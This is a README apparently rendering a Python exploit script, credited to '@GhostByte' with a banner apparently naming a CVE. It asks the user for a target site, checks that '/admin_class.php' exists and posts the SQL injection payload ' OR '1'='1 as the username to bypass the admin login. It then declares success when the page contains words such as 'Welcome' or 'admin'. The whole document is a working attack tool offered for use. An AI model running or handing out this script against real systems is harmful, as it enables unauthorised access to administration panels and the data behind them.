README.md
Rendering markdown...
import requests
import time
import sys
laz_headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
}
def check_path_exists(laz_url):
try:
response = requests.get(laz_url, headers=laz_headers)
if response.status_code == 200:
return True
else:
return False
except requests.exceptions.RequestException as e:
print(f"Error checking the path: {e}")
return False
def inject_payload(laz_url, laz_payload):
laz_data = {
"username": laz_payload,
"password": "any_password"
}
try:
response = requests.post(laz_url, data=laz_data, headers=laz_headers)
return response
except requests.exceptions.RequestException as e:
print(f"Error during injection: {e}")
return None
def simulate_injection():
animation = "|/-\\"
for _ in range(20):
sys.stdout.write(f"\rInjecting... {animation[_ % len(animation)]}")
sys.stdout.flush()
time.sleep(0.1)
print("\rInjection complete. ")
def check_injection_success(laz_response):
# Cheking for comon signs of SQL Inje
if any(keyword in laz_response.text for keyword in ["Welcome", "Dashboard", "admin", "logout"]):
return True
return False
def main():
print("""
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗██████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██║ ██║ ██╔════╝ ██╔═████╗██║ ██║╚════██╗
██║ ██║ ██║█████╗ █████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗███████╗ ██║██╔██║███████║ █████╔╝
██║ ╚██╗ ██╔╝██╔══╝ ╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝██╔═══██╗████╔╝██║╚════██║ ╚═══██╗
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗ ██║ ╚██████╔╝╚██████╔╝ ██║██████╔╝
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝╚═════╝
BY @GhostByte discord.gg/byt
""")
laz_target = input("Enter the target site (e.g., http://target-site.com): ").strip()
laz_admin_path = laz_target + "/admin_class.php"
print(f"Checking if {laz_admin_path} exists...")
if check_path_exists(laz_admin_path):
print("The path exists.")
proceed = input("Do you want to inject the payload? (Y/N): ").strip().lower()
if proceed == 'y':
laz_payload = "' OR '1'='1"
simulate_injection()
laz_response = inject_payload(laz_admin_path, laz_payload)
if laz_response and check_injection_success(laz_response):
print("SQL Injection successful! Admin login bypassed.")
else:
print("SQL Injection failed. The target might be patched or not vulnerable.")
else:
print("Injection aborted by the user.")
else:
print(f"The path {laz_admin_path} does not exist. Exiting.")
if __name__ == "__main__":
main()